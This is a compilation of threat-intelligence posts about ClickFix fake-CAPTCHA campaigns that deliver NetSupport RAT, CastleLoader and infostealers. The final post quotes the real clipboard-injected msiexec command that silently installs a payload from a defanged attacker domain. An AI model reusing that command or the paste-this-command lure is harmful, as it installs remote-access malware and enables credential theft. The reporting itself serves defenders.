ClickFix Removes Your Background but Leaves the Malware

BackgroundFix masquerades as a free image-editing tool but functions as a ClickFix social engineering lure. The fake service prompts users to verify they are human, copying malicious commands to their clipboard that invoke finger.exe to retrieve additional payloads. This chain delivers CastleLoader, which subsequently drops NetSupport RAT and a custom .NET stealer dubbed CastleStealer. The loader uses reflective PE injection, API hashing, and ChaCha20-encrypted C2 communications. CastleStealer targets browser credentials, cryptocurrency wallet extensions, and Telegram sessions through DPAPI decryption and Restart Manager APIs. The campaign leverages BYOI tactics with embedded Python interpreters and multiple shellcode stages. A notable implementation flaw exists where launch method 4 references regsrv32.exe instead of the correct regsvr32.exe, causing silent failures.

Pulse ID: 69f36a0940fe2fa665ebe32e
Pulse Link: https://otx.alienvault.com/pulse/69f36a0940fe2fa665ebe32e
Pulse Author: AlienVault
Created: 2026-04-30 14:41:13

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #ChaCha20 #Clipboard #CyberSecurity #ICS #InfoSec #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Python #RAT #ShellCode #SocialEngineering #Telegram #bot #cryptocurrency #AlienVault

2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.

Details at www.malware-traffic-analysis.net/2025/12/29/index.html

Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.

The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.

New JS#SMUGGLER malware campaign delivers #NetSupportRAT through compromised websites – hackers get full remote control of Windows machines.

Read: https://hackread.com/jssmuggler-netsupport-rat-infected-sites/

#JSsmuggler #Malware #Cybersecurity #Windows

Researchers are tracking a new ClickFix campaign called EVALUSION, delivering Amatera Stealer and NetSupport RAT.

The chain begins with Run-dialog execution during fake CAPTCHA checks, followed by mshta.exe → PowerShell → PureCrypter → DLL injection into MSBuild.exe.

Amatera includes advanced evasion and broad data-harvesting features. NetSupport RAT is deployed only when valuable data is detected.
Related phishing activity involves XWorm, Cephas kits, SmartApeSG, and Tycoon 2FA.

Thoughts on this growing reliance on execution through supposedly “trusted” system tools?

💬 Share your perspective
👍 Follow us for more clear, unbiased threat reporting

#Infosec #CyberSecurity #ClickFix #AmateraStealer #NetSupportRAT #MalwareAnalysis #ThreatIntel #MaaS #PhishingKits #SecurityResearch

Neue EVALUSION‑ClickFix‑Kampagne:
Amatera‑Stealer und NetSupport‑RAT werden verbreitet

Cyber‑Security‑Forscher von eSentire haben eine EVALUSION genannte Malware‑Kampagne entdeckt, die das mittlerweile weit verbreitete ClickFix‑Social‑Engineering‑Muster nutzt, um den Amatera Stealer und das NetSupport RAT zu installieren.

Mehr: https://maniabel.work/archiv/265

#ClickFix #AmateraStealer #NetSupportRAT, infosec #infosecnews #BeDiS

2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

#clipboardhijacking Script injected into clipboard:

msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

The downloaded file is an MSI for #NetSupportRAT

https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a